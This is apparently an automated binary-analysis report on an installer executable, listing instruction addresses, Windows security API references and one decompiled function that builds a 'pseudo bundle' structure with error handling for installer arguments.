                                                                                                                                                                  0x00432f36
                                                                                                                                                                  0x00432f39
                                                                                                                                                                  0x00432f3c
                                                                                                                                                                  0x00432f3f
                                                                                                                                                                  0x00432f42
                                                                                                                                                                  0x00432f45
                                                                                                                                                                  0x00432f48
                                                                                                                                                                  0x00432f4b
                                                                                                                                                                  0x00432f4e
                                                                                                                                                                  0x00432f51
                                                                                                                                                                  0x00432f54
                                                                                                                                                                  0x00432f57
                                                                                                                                                                  0x00432f5a
                                                                                                                                                                  0x00432f5d
                                                                                                                                                                  0x00432f60
                                                                                                                                                                  0x00432f63
                                                                                                                                                                  0x00432f66
                                                                                                                                                                  0x00432f69
                                                                                                                                                                  0x00432f6c
                                                                                                                                                                  0x00432f6f
                                                                                                                                                                  0x00432f72
                                                                                                                                                                  0x00432f75
                                                                                                                                                                  0x00432f7b
                                                                                                                                                                  0x00432f7d
                                                                                                                                                                  0x00432fb1
                                                                                                                                                                  0x00432fb7
                                                                                                                                                                  0x00432fb9
                                                                                                                                                                  0x00432ff0
                                                                                                                                                                  0x00432ff6
                                                                                                                                                                  0x00432ff8
                                                                                                                                                                  0x00433030
                                                                                                                                                                  0x00433036
                                                                                                                                                                  0x00433038
                                                                                                                                                                  0x00433078
                                                                                                                                                                  0x0043307f
                                                                                                                                                                  0x00433085
                                                                                                                                                                  0x0043303a
                                                                                                                                                                  0x0043303a
                                                                                                                                                                  0x00433049
                                                                                                                                                                  0x0043304b
                                                                                                                                                                  0x0043304e
                                                                                                                                                                  0x00433053
                                                                                                                                                                  0x00433055
                                                                                                                                                                  0x00433058
                                                                                                                                                                  0x00433059
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00433059
                                                                                                                                                                  0x00432ffa
                                                                                                                                                                  0x00432ffa
                                                                                                                                                                  0x00433009
                                                                                                                                                                  0x0043300b
                                                                                                                                                                  0x0043300e
                                                                                                                                                                  0x00433013
                                                                                                                                                                  0x00433015
                                                                                                                                                                  0x00433018
                                                                                                                                                                  0x00433019
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00433019
                                                                                                                                                                  0x00432fbb
                                                                                                                                                                  0x00432fbb
                                                                                                                                                                  0x00432fca
                                                                                                                                                                  0x00432fcc
                                                                                                                                                                  0x00432fcf
                                                                                                                                                                  0x00432fd4
                                                                                                                                                                  0x00432fd6
                                                                                                                                                                  0x00432fd9
                                                                                                                                                                  0x00432fda
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00432fda
                                                                                                                                                                  0x00432f7f
                                                                                                                                                                  0x00432f88
                                                                                                                                                                  0x00432f8a
                                                                                                                                                                  0x00432f8d
                                                                                                                                                                  0x00432f92
                                                                                                                                                                  0x00432f94
                                                                                                                                                                  0x00432f97
                                                                                                                                                                  0x00432f98
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00432f98
                                                                                                                                                                  0x00432e84
                                                                                                                                                                  0x00432e84
                                                                                                                                                                  0x00432e93
                                                                                                                                                                  0x00432e95
                                                                                                                                                                  0x00432e98
                                                                                                                                                                  0x00432e9d
                                                                                                                                                                  0x00432e9f
                                                                                                                                                                  0x00432ea2
                                                                                                                                                                  0x00432ea3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00432ea3
                                                                                                                                                                  0x00432e3e
                                                                                                                                                                  0x00432e3e
                                                                                                                                                                  0x00432e4d

                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 00432D13
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00432D1D
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00432D66
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00432D6C
                                                                                                                                                                  • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 0043307F
                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00433095
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorInitializeLastSecurity$CreateDescriptorFreeKnownLocalWell
                                                                                                                                                                  • String ID: srputil.cpp
                                                                                                                                                                  • API String ID: 3128086125-4105181634
                                                                                                                                                                  • Opcode ID: fb9d8b7f6f28cb4cf7af1031e73d3d72e4f4cbe1e34885de2a6594803e2e064f
                                                                                                                                                                  • Instruction ID: 3854fb29efb0e50843e7b96504a9bfe223bbadbb0d44c6a8133691a22e04a1c5
                                                                                                                                                                  • Opcode Fuzzy Hash: fb9d8b7f6f28cb4cf7af1031e73d3d72e4f4cbe1e34885de2a6594803e2e064f
                                                                                                                                                                  • Instruction Fuzzy Hash: 01C12171D4122CAAEB20DF659D84BEBBAF8FF08740F1142ABE909F6150D7754E418FA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E004229CE(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr* _a60, intOrPtr* _a64, intOrPtr* _a68, intOrPtr* _a72, intOrPtr _a76) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				intOrPtr _t81;
                                                                                                                                                                  				intOrPtr* _t83;
                                                                                                                                                                  				intOrPtr _t86;
                                                                                                                                                                  				intOrPtr* _t88;
                                                                                                                                                                  				intOrPtr* _t92;
                                                                                                                                                                  				intOrPtr* _t97;
                                                                                                                                                                  				intOrPtr* _t98;
                                                                                                                                                                  				intOrPtr _t103;
                                                                                                                                                                  				intOrPtr _t104;
                                                                                                                                                                  				intOrPtr* _t106;
                                                                                                                                                                  				intOrPtr* _t109;
                                                                                                                                                                  				intOrPtr* _t112;
                                                                                                                                                                  				intOrPtr* _t114;
                                                                                                                                                                  				intOrPtr _t135;
                                                                                                                                                                  				intOrPtr _t139;
                                                                                                                                                                  				intOrPtr _t144;
                                                                                                                                                                  				void* _t157;
                                                                                                                                                                  				intOrPtr _t160;
                                                                                                                                                                  				intOrPtr* _t162;
                                                                                                                                                                  				intOrPtr* _t170;
                                                                                                                                                                  				intOrPtr _t171;
                                                                                                                                                                  				void* _t173;
                                                                                                                                                                  				intOrPtr _t174;
                                                                                                                                                                  				intOrPtr _t184;
                                                                                                                                                                  				void* _t185;
                                                                                                                                                                  				intOrPtr _t186;
                                                                                                                                                                  				intOrPtr* _t188;
                                                                                                                                                                  				intOrPtr* _t194;
                                                                                                                                                                  				intOrPtr* _t197;
                                                                                                                                                                  				intOrPtr _t199;
                                                                                                                                                                  				void* _t200;
                                                                                                                                                                  
                                                                                                                                                                  				_t185 = __edi;
                                                                                                                                                                  				_t157 = __ebx;
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				if(E00411E63(_a24) != 0) {
                                                                                                                                                                  					E00433CEA( &_v8, L" -%ls", _t80);
                                                                                                                                                                  					_t200 = _t200 + 0xc;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push(_t157);
                                                                                                                                                                  				_push(_t185);
                                                                                                                                                                  				_t81 = E00431078(8, 1);
                                                                                                                                                                  				_t186 = _a12;
                                                                                                                                                                  				 *((intOrPtr*)(_t186 + 0x7c)) = _t81;
                                                                                                                                                                  				if(_t81 != 0) {
                                                                                                                                                                  					 *((intOrPtr*)(_t186 + 0x80)) = 1;
                                                                                                                                                                  					 *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))) = E00431078(0x58, 1);
                                                                                                                                                                  					_t83 =  *((intOrPtr*)(_t186 + 0x7c));
                                                                                                                                                                  					__eflags = _t83;
                                                                                                                                                                  					if(_t83 != 0) {
                                                                                                                                                                  						_t160 = _a44;
                                                                                                                                                                  						 *((intOrPtr*)( *_t83 + 4)) = 3;
                                                                                                                                                                  						_t86 =  *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c))));
                                                                                                                                                                  						 *((intOrPtr*)(_t86 + 0x10)) = _t160;
                                                                                                                                                                  						 *((intOrPtr*)(_t86 + 0x14)) = _a48;
                                                                                                                                                                  						_t88 = E00433F88( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))), _a20, 0);
                                                                                                                                                                  						__eflags = _t88;
                                                                                                                                                                  						if(_t88 >= 0) {
                                                                                                                                                                  							_t92 = E00433F88( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))) + 0x18, _a32, 0);
                                                                                                                                                                  							__eflags = _t92;
                                                                                                                                                                  							if(_t92 >= 0) {
                                                                                                                                                                  								_t97 = E00433F88( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))) + 0x38, _a36, 0);
                                                                                                                                                                  								__eflags = _t97;
                                                                                                                                                                  								if(_t97 >= 0) {
                                                                                                                                                                  									_t98 = _a40;
                                                                                                                                                                  									_t170 = 0;
                                                                                                                                                                  									__eflags = _t98;
                                                                                                                                                                  									if(_t98 == 0) {
                                                                                                                                                                  										L18:
                                                                                                                                                                  										__eflags = _a72;
                                                                                                                                                                  										if(_a72 == 0) {
                                                                                                                                                                  											L22:
                                                                                                                                                                  											_t171 = _a28;
                                                                                                                                                                  											__eflags = _t171 - 4;
                                                                                                                                                                  											if(_t171 == 4) {
                                                                                                                                                                  												L25:
                                                                                                                                                                  												_t184 = 1;
                                                                                                                                                                  												_t194 = 0;
                                                                                                                                                                  												__eflags = 0;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												__eflags = _t171 - 3;
                                                                                                                                                                  												if(_t171 == 3) {
                                                                                                                                                                  													goto L25;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_t194 = 0;
                                                                                                                                                                  													_t184 = 0;
                                                                                                                                                                  												}
                                                                                                                                                                  											}
                                                                                                                                                                  											 *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)) + 4)) = _t184;
                                                                                                                                                                  											 *((intOrPtr*)(_t186 + 0xa4)) = 1;
                                                                                                                                                                  											 *((intOrPtr*)(_t186 + 0x8c)) = 1;
                                                                                                                                                                  											 *((intOrPtr*)(_t186 + 0x14)) = _a16;
                                                                                                                                                                  											 *((intOrPtr*)(_t186 + 0x40)) = _t171;
                                                                                                                                                                  											__eflags = _t171 - 4;
                                                                                                                                                                  											if(_t171 == 4) {
                                                                                                                                                                  												L29:
                                                                                                                                                                  												_t103 = 2;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												__eflags = _t171 - 3;
                                                                                                                                                                  												if(_t171 == 3) {
                                                                                                                                                                  													goto L29;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_t103 = _t194;
                                                                                                                                                                  												}
                                                                                                                                                                  											}
                                                                                                                                                                  											 *((intOrPtr*)(_t186 + 0x44)) = _t103;
                                                                                                                                                                  											_t104 = _a48;
                                                                                                                                                                  											 *((intOrPtr*)(_t186 + 0x2c)) = _t104;
                                                                                                                                                                  											 *((intOrPtr*)(_t186 + 0x34)) = _t104;
                                                                                                                                                                  											 *((intOrPtr*)(_t186 + 0x28)) = _t160;
                                                                                                                                                                  											 *((intOrPtr*)(_t186 + 0x30)) = _t160;
                                                                                                                                                                  											 *((intOrPtr*)(_t186 + 0x1c)) = _a52;
                                                                                                                                                                  											_t106 = E00433F88(_t186, _a20, _t194);
                                                                                                                                                                  											__eflags = _t106;
                                                                                                                                                                  											if(_t106 >= 0) {
                                                                                                                                                                  												_t52 = _t186 + 0x24; // 0x11c
                                                                                                                                                                  												_t109 = E00433F88(_t52, _a20, 0);
                                                                                                                                                                  												__eflags = _t109;
                                                                                                                                                                  												if(_t109 >= 0) {
                                                                                                                                                                  													_t54 = _t186 + 0x94; // 0x18c
                                                                                                                                                                  													_t161 = _t54;
                                                                                                                                                                  													_t197 = E00433F88(_t54, _a56, 0);
                                                                                                                                                                  													__eflags = _t197;
                                                                                                                                                                  													if(_t197 >= 0) {
                                                                                                                                                                  														_t112 = _v8;
                                                                                                                                                                  														__eflags = _t112;
                                                                                                                                                                  														if(_t112 == 0) {
                                                                                                                                                                  															L39:
                                                                                                                                                                  															__eflags = _a60;
                                                                                                                                                                  															if(_a60 == 0) {
                                                                                                                                                                  																L46:
                                                                                                                                                                  																__eflags = _a64;
                                                                                                                                                                  																if(_a64 == 0) {
                                                                                                                                                                  																	L53:
                                                                                                                                                                  																	_t173 = _a4 + 0xf7530000;
                                                                                                                                                                  																	asm("adc eax, 0xfffcfff9");
                                                                                                                                                                  																	__eflags = _a8 - 1;
                                                                                                                                                                  																	if(__eflags > 0) {
                                                                                                                                                                  																		L57:
                                                                                                                                                                  																		_t114 = 0;
                                                                                                                                                                  																		__eflags = 0;
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		if(__eflags < 0) {
                                                                                                                                                                  																			L56:
                                                                                                                                                                  																			_t114 = 1;
                                                                                                                                                                  																		} else {
                                                                                                                                                                  																			__eflags = _t173 - 0xfbbb0000;
                                                                                                                                                                  																			if(_t173 > 0xfbbb0000) {
                                                                                                                                                                  																				goto L57;
                                                                                                                                                                  																			} else {
                                                                                                                                                                  																				goto L56;
                                                                                                                                                                  																			}
                                                                                                                                                                  																		}
                                                                                                                                                                  																	}
                                                                                                                                                                  																	_t162 = _a68;
                                                                                                                                                                  																	 *((intOrPtr*)(_t186 + 0xac)) = _t114;
                                                                                                                                                                  																	__eflags = _t162;
                                                                                                                                                                  																	if(_t162 != 0) {
                                                                                                                                                                  																		_t174 = E00431078(0x10, 1);
                                                                                                                                                                  																		 *((intOrPtr*)(_t186 + 0x84)) = _t174;
                                                                                                                                                                  																		__eflags = _t174;
                                                                                                                                                                  																		if(_t174 != 0) {
                                                                                                                                                                  																			 *((intOrPtr*)(_t186 + 0x88)) = 1;
                                                                                                                                                                  																			 *((intOrPtr*)(_t174 + 0xc)) =  *((intOrPtr*)(_t162 + 0xc));
                                                                                                                                                                  																			_t197 = E00433F88( *((intOrPtr*)(_t186 + 0x84)),  *_t162, 0);
                                                                                                                                                                  																			__eflags = _t197;
                                                                                                                                                                  																			if(_t197 < 0) {
                                                                                                                                                                  																				goto L31;
                                                                                                                                                                  																			} else {
                                                                                                                                                                  																				_t197 = E00433F88( *((intOrPtr*)(_t186 + 0x84)) + 4,  *((intOrPtr*)(_t162 + 4)), 0);
                                                                                                                                                                  																				__eflags = _t197;
                                                                                                                                                                  																				if(_t197 >= 0) {
                                                                                                                                                                  																					_t197 = E00433F88( *((intOrPtr*)(_t186 + 0x84)) + 8,  *((intOrPtr*)(_t162 + 8)), 0);
                                                                                                                                                                  																					__eflags = _t197;
                                                                                                                                                                  																					if(_t197 < 0) {
                                                                                                                                                                  																						_push("Failed to copy display name for pseudo bundle.");
                                                                                                                                                                  																						goto L66;
                                                                                                                                                                  																					}
                                                                                                                                                                  																				} else {
                                                                                                                                                                  																					_push("Failed to copy version for pseudo bundle.");
                                                                                                                                                                  																					goto L66;
                                                                                                                                                                  																				}
                                                                                                                                                                  																			}
                                                                                                                                                                  																		} else {
                                                                                                                                                                  																			_t188 = 0x8007000e;
                                                                                                                                                                  																			_t197 = 0x8007000e;
                                                                                                                                                                  																			E004300D9(_t118, "pseudobundle.cpp", 0x8d, 0x8007000e);
                                                                                                                                                                  																			_push("Failed to allocate memory for dependency providers.");
                                                                                                                                                                  																			goto L4;
                                                                                                                                                                  																		}
                                                                                                                                                                  																	}
                                                                                                                                                                  																} else {
                                                                                                                                                                  																	_t63 = _t186 + 0x9c; // 0x194
                                                                                                                                                                  																	_t164 = _t63;
                                                                                                                                                                  																	_t197 = E00433F88(_t63, _a64, 0);
                                                                                                                                                                  																	__eflags = _t197;
                                                                                                                                                                  																	if(_t197 >= 0) {
                                                                                                                                                                  																		_t135 = _v8;
                                                                                                                                                                  																		__eflags = _t135;
                                                                                                                                                                  																		if(_t135 == 0) {
                                                                                                                                                                  																			L52:
                                                                                                                                                                  																			 *((intOrPtr*)(_t186 + 0x18)) = 1;
                                                                                                                                                                  																			goto L53;
                                                                                                                                                                  																		} else {
                                                                                                                                                                  																			_t197 = E00433C35(0, _t164, _t135, 0);
                                                                                                                                                                  																			__eflags = _t197;
                                                                                                                                                                  																			if(_t197 >= 0) {
                                                                                                                                                                  																				goto L52;
                                                                                                                                                                  																			} else {
                                                                                                                                                                  																				_push("Failed to append relation type to uninstall arguments for related bundle package");
                                                                                                                                                                  																				goto L66;
                                                                                                                                                                  																			}
                                                                                                                                                                  																		}
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		_push("Failed to copy uninstall arguments for related bundle package");
                                                                                                                                                                  																		goto L66;
                                                                                                                                                                  																	}
                                                                                                                                                                  																}
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_t58 = _t186 + 0x98; // 0x190
                                                                                                                                                                  																_t165 = _t58;
                                                                                                                                                                  																_t197 = E00433F88(_t58, _a60, 0);
                                                                                                                                                                  																__eflags = _t197;
                                                                                                                                                                  																if(_t197 >= 0) {
                                                                                                                                                                  																	_t139 = _v8;
                                                                                                                                                                  																	__eflags = _t139;
                                                                                                                                                                  																	if(_t139 == 0) {
                                                                                                                                                                  																		L45:
                                                                                                                                                                  																		 *((intOrPtr*)(_t186 + 0xa8)) = 1;
                                                                                                                                                                  																		goto L46;
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		_t197 = E00433C35(0, _t165, _t139, 0);
                                                                                                                                                                  																		__eflags = _t197;
                                                                                                                                                                  																		if(_t197 >= 0) {
                                                                                                                                                                  																			goto L45;
                                                                                                                                                                  																		} else {
                                                                                                                                                                  																			_push("Failed to append relation type to repair arguments for related bundle package");
                                                                                                                                                                  																			goto L66;
                                                                                                                                                                  																		}
                                                                                                                                                                  																	}
                                                                                                                                                                  																} else {
                                                                                                                                                                  																	_push("Failed to copy repair arguments for related bundle package");
                                                                                                                                                                  																	goto L66;
                                                                                                                                                                  																}
                                                                                                                                                                  															}
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t197 = E00433C35(0, _t161, _t112, 0);
                                                                                                                                                                  															__eflags = _t197;
                                                                                                                                                                  															if(_t197 >= 0) {
                                                                                                                                                                  																goto L39;
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_push("Failed to append relation type to install arguments for related bundle package");
                                                                                                                                                                  																goto L66;
                                                                                                                                                                  															}
                                                                                                                                                                  														}
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_push("Failed to copy install arguments for related bundle package");
                                                                                                                                                                  														goto L66;
                                                                                                                                                                  													}
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_push("Failed to copy cache id for pseudo bundle.");
                                                                                                                                                                  													goto L66;
                                                                                                                                                                  												}
                                                                                                                                                                  											} else {
                                                                                                                                                                  												L31:
                                                                                                                                                                  												_push("Failed to copy key for pseudo bundle.");
                                                                                                                                                                  												goto L66;
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t199 = _a76;
                                                                                                                                                                  											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))) + 0x30)) = E00431078(_t199, _t170);
                                                                                                                                                                  											_t144 =  *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c))));
                                                                                                                                                                  											__eflags =  *((intOrPtr*)(_t144 + 0x30));
                                                                                                                                                                  											if( *((intOrPtr*)(_t144 + 0x30)) != 0) {
                                                                                                                                                                  												 *((intOrPtr*)(_t144 + 0x34)) = _t199;
                                                                                                                                                                  												E00426F91( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))) + 0x30)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))) + 0x34)), _a72, _t199);
                                                                                                                                                                  												goto L22;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t188 = 0x8007000e;
                                                                                                                                                                  												_t197 = 0x8007000e;
                                                                                                                                                                  												E004300D9(_t144, "pseudobundle.cpp", 0x4a, 0x8007000e);
                                                                                                                                                                  												_push("Failed to allocate memory for pseudo bundle payload hash.");
                                                                                                                                                                  												goto L4;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										__eflags =  *_t98;
                                                                                                                                                                  										if( *_t98 == 0) {
                                                                                                                                                                  											goto L18;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t197 = E00433F88( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x7c)))) + 0x40, _t98, 0);
                                                                                                                                                                  											__eflags = _t197;
                                                                                                                                                                  											if(_t197 >= 0) {
                                                                                                                                                                  												_t170 = 0;
                                                                                                                                                                  												__eflags = 0;
                                                                                                                                                                  												goto L18;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_push("Failed to copy download source for pseudo bundle.");
                                                                                                                                                                  												goto L66;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push("Failed to copy local source path for pseudo bundle.");
                                                                                                                                                                  									goto L66;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to copy filename for pseudo bundle.");
                                                                                                                                                                  								goto L66;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push("Failed to copy key for pseudo bundle payload.");
                                                                                                                                                                  							L66:
                                                                                                                                                                  							_push(_t197);
                                                                                                                                                                  							goto L67;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t188 = 0x8007000e;
                                                                                                                                                                  						_t197 = 0x8007000e;
                                                                                                                                                                  						E004300D9(_t83, "pseudobundle.cpp", 0x34, 0x8007000e);
                                                                                                                                                                  						_push("Failed to allocate space for burn payload inside of related bundle struct");
                                                                                                                                                                  						goto L4;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t188 = 0x8007000e;
                                                                                                                                                                  					_t197 = 0x8007000e;
                                                                                                                                                                  					E004300D9(_t81, "pseudobundle.cpp", 0x30, 0x8007000e);
                                                                                                                                                                  					_push("Failed to allocate space for burn package payload inside of related bundle struct");
                                                                                                                                                                  					L4:
                                                                                                                                                                  					_push(_t188);
                                                                                                                                                                  					L67:
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				_t115 = _v8;
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					E004380AB(_t115);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t197;
                                                                                                                                                                  			}



































                                                                                                                                                                  0x00422ceb
                                                                                                                                                                  0x00422cf1
                                                                                                                                                                  0x00422cf7
                                                                                                                                                                  0x00422cfc
                                                                                                                                                                  0x00422cff
                                                                                                                                                                  0x00422d10
                                                                                                                                                                  0x00422d10
                                                                                                                                                                  0x00422d10
                                                                                                                                                                  0x00422d01
                                                                                                                                                                  0x00422d01
                                                                                                                                                                  0x00422d0b
                                                                                                                                                                  0x00422d0d
                                                                                                                                                                  0x00422d03
                                                                                                                                                                  0x00422d03
                                                                                                                                                                  0x00422d09
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422d09
                                                                                                                                                                  0x00422d01
                                                                                                                                                                  0x00422d12
                                                                                                                                                                  0x00422d15
                                                                                                                                                                  0x00422d1b
                                                                                                                                                                  0x00422d1d
                                                                                                                                                                  0x00422d2c
                                                                                                                                                                  0x00422d2e
                                                                                                                                                                  0x00422d34
                                                                                                                                                                  0x00422d36
                                                                                                                                                                  0x00422d59
                                                                                                                                                                  0x00422d66
                                                                                                                                                                  0x00422d79
                                                                                                                                                                  0x00422d7b
                                                                                                                                                                  0x00422d7d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422d83
                                                                                                                                                                  0x00422d98
                                                                                                                                                                  0x00422d9a
                                                                                                                                                                  0x00422d9c
                                                                                                                                                                  0x00422dba
                                                                                                                                                                  0x00422dbc
                                                                                                                                                                  0x00422dbe
                                                                                                                                                                  0x00422dc0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422dc0
                                                                                                                                                                  0x00422d9e
                                                                                                                                                                  0x00422d9e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422d9e
                                                                                                                                                                  0x00422d9c
                                                                                                                                                                  0x00422d38
                                                                                                                                                                  0x00422d38
                                                                                                                                                                  0x00422d48
                                                                                                                                                                  0x00422d4a
                                                                                                                                                                  0x00422d4f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422d4f
                                                                                                                                                                  0x00422d36
                                                                                                                                                                  0x00422ca1
                                                                                                                                                                  0x00422ca7
                                                                                                                                                                  0x00422ca7
                                                                                                                                                                  0x00422cb3
                                                                                                                                                                  0x00422cb5
                                                                                                                                                                  0x00422cb7
                                                                                                                                                                  0x00422cc3
                                                                                                                                                                  0x00422cc6
                                                                                                                                                                  0x00422cc8
                                                                                                                                                                  0x00422ce4
                                                                                                                                                                  0x00422ce4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422cca
                                                                                                                                                                  0x00422cd4
                                                                                                                                                                  0x00422cd6
                                                                                                                                                                  0x00422cd8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422cda
                                                                                                                                                                  0x00422cda
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422cda
                                                                                                                                                                  0x00422cd8
                                                                                                                                                                  0x00422cb9
                                                                                                                                                                  0x00422cb9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422cb9
                                                                                                                                                                  0x00422cb7
                                                                                                                                                                  0x00422c4e
                                                                                                                                                                  0x00422c54
                                                                                                                                                                  0x00422c54
                                                                                                                                                                  0x00422c60
                                                                                                                                                                  0x00422c62
                                                                                                                                                                  0x00422c64
                                                                                                                                                                  0x00422c70
                                                                                                                                                                  0x00422c73
                                                                                                                                                                  0x00422c75
                                                                                                                                                                  0x00422c91
                                                                                                                                                                  0x00422c91
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422c77
                                                                                                                                                                  0x00422c81
                                                                                                                                                                  0x00422c83
                                                                                                                                                                  0x00422c85
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422c87
                                                                                                                                                                  0x00422c87
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422c87
                                                                                                                                                                  0x00422c85
                                                                                                                                                                  0x00422c66
                                                                                                                                                                  0x00422c66
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422c66
                                                                                                                                                                  0x00422c64
                                                                                                                                                                  0x00422c2e
                                                                                                                                                                  0x00422c38
                                                                                                                                                                  0x00422c3a
                                                                                                                                                                  0x00422c3c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422c3e
                                                                                                                                                                  0x00422c3e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422c3e
                                                                                                                                                                  0x00422c3c
                                                                                                                                                                  0x00422c1d
                                                                                                                                                                  0x00422c1d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422c1d
                                                                                                                                                                  0x00422bfb
                                                                                                                                                                  0x00422bfb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422bfb
                                                                                                                                                                  0x00422bdc
                                                                                                                                                                  0x00422bdc
                                                                                                                                                                  0x00422bdc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422bdc
                                                                                                                                                                  0x00422b17
                                                                                                                                                                  0x00422b17
                                                                                                                                                                  0x00422b26
                                                                                                                                                                  0x00422b2e
                                                                                                                                                                  0x00422b30
                                                                                                                                                                  0x00422b33
                                                                                                                                                                  0x00422b53
                                                                                                                                                                  0x00422b65
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422b35
                                                                                                                                                                  0x00422b35
                                                                                                                                                                  0x00422b42
                                                                                                                                                                  0x00422b44
                                                                                                                                                                  0x00422b49
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422b49
                                                                                                                                                                  0x00422b33
                                                                                                                                                                  0x00422aea
                                                                                                                                                                  0x00422aea
                                                                                                                                                                  0x00422aed
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00422aef
                                                                                                                                                                  0x00422aff
                                                                                                                                                                  0x00422b01
                                                                                                                                                                  0x00422b03
                                                                                                                                                                  0x00422b0f

                                                                                                                                                                  Strings
                                                                                                                                                                  • -%ls, xrefs: 004229E8
                                                                                                                                                                  • Failed to copy display name for pseudo bundle., xrefs: 00422DC0
                                                                                                                                                                  • pseudobundle.cpp, xrefs: 00422A15, 00422A4E, 00422B3D, 00422D43
                                                                                                                                                                  • Failed to copy key for pseudo bundle., xrefs: 00422BDC
